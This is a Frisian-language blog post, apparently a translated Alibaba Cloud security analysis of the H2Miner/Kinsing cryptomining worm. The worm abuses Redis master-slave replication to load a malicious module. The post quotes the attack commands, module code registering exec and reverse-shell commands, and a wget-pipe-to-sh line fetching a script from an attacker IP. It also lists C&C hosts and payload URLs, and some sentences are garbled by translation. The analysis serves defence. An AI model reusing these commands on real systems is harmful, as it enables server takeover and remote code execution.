In dei lyn waard ien fan de tsjinners fan myn projekt oanfallen troch in ferlykbere wjirm. Op syk nei in antwurd op de fraach "wat wie dat?" Ik fûn in geweldich artikel fan it Alibaba Cloud Security-team. Om't ik dit artikel net fûn op Habré, besleat ik it spesjaal foar jo oer te setten <3
Ynlieding
Koartlyn ûntduts it feiligensteam fan Alibaba Cloud in hommelse útbraak fan H2Miner. Dit soarte fan kweade wjirm brûkt it ûntbrekken fan autorisaasje of swakke wachtwurden foar Redis as tagongspoarten nei jo systemen, wêrnei't it syn eigen kweade module mei de slaaf syngronisearret troch master-slave-syngronisaasje en úteinlik dizze kweade module nei de oanfallen masine downloadt en kwea-aardige útfiert ynstruksjes.
Yn it ferline waarden oanfallen op jo systemen primêr útfierd mei in metoade mei plande taken of SSH-kaaien dy't nei jo masine waarden skreaun nei't de oanfaller ynlogd wie op Redis. Gelokkich kin dizze metoade net faak brûkt wurde fanwege problemen mei tastimmingskontrôle of troch ferskate systeemferzjes. Dizze metoade foar it laden fan in kweade module kin lykwols de kommando's fan 'e oanfaller direkt útfiere of tagong krije ta de shell, wat gefaarlik is foar jo systeem.
Fanwegen it grutte oantal Redis-tsjinners dat op it ynternet wurdt hosted (hast 1 miljoen), advisearret Alibaba Cloud's feiligensteam, as in freonlike herinnering, brûkers Redis net online te dielen en regelmjittich de sterkte fan har wachtwurden te kontrolearjen en oft se kompromittearre binne. flugge seleksje.
H2 Miner
H2Miner is in mining-botnet foar Linux-basearre systemen dy't jo systeem op ferskate manieren kinne ynfalle, ynklusyf gebrek oan autorisaasje yn Hadoop yarn, Docker, en Redis remote command execution (RCE) kwetsberens. In botnet wurket troch it downloaden fan kweade skripts en malware om jo gegevens te minen, de oanfal horizontaal út te wreidzjen en kommando en kontrôle (C&C) kommunikaasje te behâlden.
Redis RCE
Kennis oer dit ûnderwerp waard dield troch Pavel Toporkov by ZeroNights 2018. Nei ferzje 4.0 stipet Redis in plug-in laden funksje dy't brûkers de mooglikheid jout om te laden sadat bestannen kompilearre mei C yn Redis om spesifike Redis-kommando's út te fieren. Dizze funksje, hoewol brûkber, befettet in kwetsberens wêryn, yn master-slave-modus, bestannen kinne wurde syngronisearre mei de slave fia folsleine resync-modus. Dit kin brûkt wurde troch in oanfaller om kweade-so-bestannen oer te dragen. Nei't de oerdracht foltôge is, laden de oanfallers de module op 'e oanfallen Redis-eksimplaar en fiere elk kommando út.
Malware Worm Analysis
Koartlyn ûntduts it Alibaba Cloud-befeiligingsteam dat de grutte fan 'e H2Miner kweade minergroep ynienen dramatysk tanommen is. Neffens de analyze is it algemiene proses fan oanfallen as folget:
H2Miner brûkt RCE Redis foar in folweardich oanfal. Oanfallers oanfalle earst ûnbeskerme Redis-tsjinners as servers mei swakke wachtwurden.
Dan brûke se it kommando config set dbfilename red2.so om de triemnamme te feroarjen. Hjirnei fiere de oanfallers it kommando út slaveof om it master-slave-replikaasjehostadres yn te stellen.
As de oanfallen Redis-eksimplaar in master-slave-ferbining makket mei de kweade Redis dy't eigendom is fan de oanfaller, stjoert de oanfaller de ynfekteare module mei it kommando fullresync om de bestannen te syngronisearjen. De red2.so triem sil dan ynladen wurde nei de oanfallen masine. De oanfallers brûke dan de ./red2.so laden module om dit so bestân te laden. De module kin kommando's útfiere fan in oanfaller of in omkearde ferbining (efterdoar) begjinne om tagong te krijen ta de oanfallen masine.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Nei it útfieren fan in kwea-aardich kommando lykas / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, sil de oanfaller de reservekopybestânnamme weromsette en de systeemmodule ûntladen om de spoaren op te romjen. It red2.so-bestân sil lykwols noch op 'e oanfallen masine bliuwe. Brûkers wurde advisearre om omtinken te jaan oan de oanwêzigens fan sa'n fertochte triem yn 'e map fan har Redis-eksimplaar.
Neist it fermoardzjen fan guon kweade prosessen om boarnen te stellen, folge de oanfaller in kwea-aardich skript troch it downloaden en útfieren fan kweade binêre bestannen nei . Dit betsjut dat de prosesnamme of mapnamme mei kinsing op de host kin oanjaan dat dy masine ynfektearre is troch dit firus.
Neffens de resultaten fan reverse engineering fiert de malware benammen de folgjende funksjes út:
- Bestannen oplade en se útfiere
- Mynbou
- C&C-kommunikaasje behâlde en oanfallerkommando's útfiere
Brûk masscan foar eksterne skennen om jo ynfloed út te wreidzjen. Derneist is it IP-adres fan 'e C&C-tsjinner hurdkodearre yn it programma, en de oanfallen host sil kommunisearje mei de C&C-kommunikaasjetsjinner mei HTTP-oanfragen, wêrby't de zombie (kompromitterde tsjinner) ynformaasje wurdt identifisearre yn 'e HTTP-koptekst.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Oare oanfal metoaden
Adressen en keppelings brûkt troch de wjirm
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Earst moat Redis net tagonklik wêze fan it ynternet en moat wurde beskerme mei in sterk wachtwurd. It is ek wichtich dat kliïnten kontrolearje dat der gjin red2.so-bestân is yn 'e Redis-map en dat der gjin "kinsing" is yn 'e triem-/prosesnamme op 'e host.
Boarne: www.habr.com